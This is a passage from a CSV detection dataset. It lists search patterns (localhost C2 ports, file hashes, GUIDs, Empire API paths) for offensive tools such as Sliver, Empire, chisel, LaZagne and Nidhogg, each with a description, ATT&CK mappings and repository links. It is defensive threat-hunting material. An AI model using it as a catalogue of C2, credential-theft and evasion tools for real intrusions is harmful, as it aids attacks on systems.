- TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*127.0.0.1:1337*",".{0,1000}127\.0\.0\.1\:1337.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. 
It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use them with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*127.0.0.1:2222*",".{0,1000}127\.0\.0\.1\:2222.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*127.0.0.1:31337*",".{0,1000}127\.0\.0\.1\:31337.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*127.0.0.1:4567*",".{0,1000}127\.0\.0\.1\:4567.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","50","4","2024-04-12T15:25:40Z","2023-04-19T10:59:30Z" "*127.0.0.1:53531*",".{0,1000}127\.0\.0\.1\:53531.{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" 
"*127.0.0.1:5555*",".{0,1000}127\.0\.0\.1\:5555.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*127.0.0.1:7777*",".{0,1000}127\.0\.0\.1\:7777.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*127.0.0.1:8022*",".{0,1000}127\.0\.0\.1\:8022.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","73","12","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" "*127.0.0.1:8848*",".{0,1000}127\.0\.0\.1\:8848.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*127.0.0.1:9050*",".{0,1000}127\.0\.0\.1\:9050.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok 
integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","73","12","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" "*127.0.0.1:9050*",".{0,1000}127\.0\.0\.1\:9050.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*128038cf630fced3b39cb074030f57e07cf1e975bc374ff7e281cce382284264*",".{0,1000}128038cf630fced3b39cb074030f57e07cf1e975bc374ff7e281cce382284264.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*12e0ec8e9b714f9f157496dace0e714238403b5e8f3000bbeedf31b0a811bf73*",".{0,1000}12e0ec8e9b714f9f157496dace0e714238403b5e8f3000bbeedf31b0a811bf73.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*12e9256bbb969343cc20fa9e259c0af1bf12d6c7bd0263bd7b2a60575b73cf62*",".{0,1000}12e9256bbb969343cc20fa9e259c0af1bf12d6c7bd0263bd7b2a60575b73cf62.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation 
tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*13116f7c3441519cd91e74061f0490c15b1b99f32a5209ec52b9cc4ef3fb67de*",".{0,1000}13116f7c3441519cd91e74061f0490c15b1b99f32a5209ec52b9cc4ef3fb67de.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*13118127bd6a7dfaf76cb35833325627d1df6937064f6ec7d3a05f5829902d2b*",".{0,1000}13118127bd6a7dfaf76cb35833325627d1df6937064f6ec7d3a05f5829902d2b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*1328197e04ea25df954765cb6b7cd7a2a13bae3ffdd71c4e60a8a627508efda6*",".{0,1000}1328197e04ea25df954765cb6b7cd7a2a13bae3ffdd71c4e60a8a627508efda6.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" 
"*132ab5d9aa388ae3a6575a01fadeb7fa7f77aac1150fc54bc1d20ae32b58ddc5*",".{0,1000}132ab5d9aa388ae3a6575a01fadeb7fa7f77aac1150fc54bc1d20ae32b58ddc5.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","0","image","5","10","1492","260","2023-03-01T17:09:02Z","2019-05-14T06:09:25Z" "*1337*/api/agents/*/results?token=*",".{0,1000}1337.{0,1000}\/api\/agents\/.{0,1000}\/results\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*1337*/api/creds?token=*",".{0,1000}1337.{0,1000}\/api\/creds\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and 
adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*1337*/api/listeners?token=*",".{0,1000}1337.{0,1000}\/api\/listeners\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - 
T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*1337*infernal-twin*",".{0,1000}1337.{0,1000}infernal\-twin.{0,1000}","offensive_tool_keyword","infernal-twin","This tool is created to aid the penetration testers in assessing wireless security.","T1533 - T1553 - T1560 - T1569 - T1583","TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/entropy1337/infernal-twin","1","1","N/A","N/A","10","1215","258","2022-10-27T11:39:14Z","2015-02-07T21:04:57Z" "*1337OMGsam*",".{0,1000}1337OMGsam.{0,1000}","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*1337OMGsys*",".{0,1000}1337OMGsys.{0,1000}","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*13431429-2DB6-480F-B73F-CA019FE759E3*",".{0,1000}13431429\-2DB6\-480F\-B73F\-CA019FE759E3.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often 
found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*135af50a105b966d85fc745bdac0b918c1afa0c1a7d4bbaf66acbc89eb59172a*",".{0,1000}135af50a105b966d85fc745bdac0b918c1afa0c1a7d4bbaf66acbc89eb59172a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*1372ebd0f43824ac646712ab9b47a28938e2b58eb1dce8337c1d905dea0f7523*",".{0,1000}1372ebd0f43824ac646712ab9b47a28938e2b58eb1dce8337c1d905dea0f7523.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*13A59BB8-0246-4FFA-951B-89B9A341F159*",".{0,1000}13A59BB8\-0246\-4FFA\-951B\-89B9A341F159.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*13ac39c3d0379d55f1fdab74b78354fd7d8c23ce43e0bd2f86c64ec21f2abe63*",".{0,1000}13ac39c3d0379d55f1fdab74b78354fd7d8c23ce43e0bd2f86c64ec21f2abe63.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*13C57810-FF18-4258-ABC9-935040A54F0B*",".{0,1000}13C57810\-FF18\-4258\-ABC9\-935040A54F0B.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*14083A04-DD4B-4E7D-A16E-86947D3D6D74*",".{0,1000}14083A04\-DD4B\-4E7D\-A16E\-86947D3D6D74.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*14268f4b4154d80f6c8a20bd79cca08e829cfef4d5f5c244d968c3652da7a336*",".{0,1000}14268f4b4154d80f6c8a20bd79cca08e829cfef4d5f5c244d968c3652da7a336.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*142d3b96f2c42d4660afb05c725185377a58cf521667ed4efc360171ffcc2e97*",".{0,1000}142d3b96f2c42d4660afb05c725185377a58cf521667ed4efc360171ffcc2e97.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*143ec041216db8df445e02dbb3a71e1603ab495879f073f63857474e32d239b4*",".{0,1000}143ec041216db8df445e02dbb3a71e1603ab495879f073f63857474e32d239b4.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*14551c1d7c781b632e6722cfde0abb62c0698a657bf621ebe6e931a197e81715*",".{0,1000}14551c1d7c781b632e6722cfde0abb62c0698a657bf621ebe6e931a197e81715.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1464a0e12ee6eacddcc2bc879ad601918412b0d64f3cdceb04c216d6a5485052*",".{0,1000}1464a0e12ee6eacddcc2bc879ad601918412b0d64f3cdceb04c216d6a5485052.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*1487de57ec8a5a8201abe0b868c17ff8cf04bed18a298050edb663a793c0e030*",".{0,1000}1487de57ec8a5a8201abe0b868c17ff8cf04bed18a298050edb663a793c0e030.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*148a719060fcc5ed37c33027cd39e320ca7fdd113500d5ea63128b8c506d86bc*",".{0,1000}148a719060fcc5ed37c33027cd39e320ca7fdd113500d5ea63128b8c506d86bc.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a 
honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*14a0f72e21730cd71eb2c9cf9a22682ac386aac36cca6a270ef01d9c1bd4561e*",".{0,1000}14a0f72e21730cd71eb2c9cf9a22682ac386aac36cca6a270ef01d9c1bd4561e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*14d0b48fef0484e290504ebd35fcca973fde787ef3db70b70de8b3070b287d46*",".{0,1000}14d0b48fef0484e290504ebd35fcca973fde787ef3db70b70de8b3070b287d46.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*14e2f70470396a18c27debb419a4f4063c2ad5b6976f429d47f55e31066a5e6a*",".{0,1000}14e2f70470396a18c27debb419a4f4063c2ad5b6976f429d47f55e31066a5e6a.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - 
TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*14e8721290b9457ec4c641c48aaa111df18eeed8e1c208da18666d3f3dd8e2ff*",".{0,1000}14e8721290b9457ec4c641c48aaa111df18eeed8e1c208da18666d3f3dd8e2ff.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*14ed05af8630a01f953eee94967bf1e6a322819bf404b451038f8aacbde5569b*",".{0,1000}14ed05af8630a01f953eee94967bf1e6a322819bf404b451038f8aacbde5569b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*15079a1ec5eff9da11edafb3c59984d2ab9ce7b02fabfd07cc398ee31e7e1dc8*",".{0,1000}15079a1ec5eff9da11edafb3c59984d2ab9ce7b02fabfd07cc398ee31e7e1dc8.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline separated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*15bc39581933d59dcdb7a264d149cf9bec398e04d18ab0b52f596861614c37b3*",".{0,1000}15bc39581933d59dcdb7a264d149cf9bec398e04d18ab0b52f596861614c37b3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*15c8924d9a1c039c2afaf54c431cda1aa0afd3a2dcf67d88d9cafc3ec89cc21b*",".{0,1000}15c8924d9a1c039c2afaf54c431cda1aa0afd3a2dcf67d88d9cafc3ec89cc21b.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*15fc3df52f81c0f09a430e52a2612d1a999284eeb802c8cec48d135fc3b46414*",".{0,1000}15fc3df52f81c0f09a430e52a2612d1a999284eeb802c8cec48d135fc3b46414.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 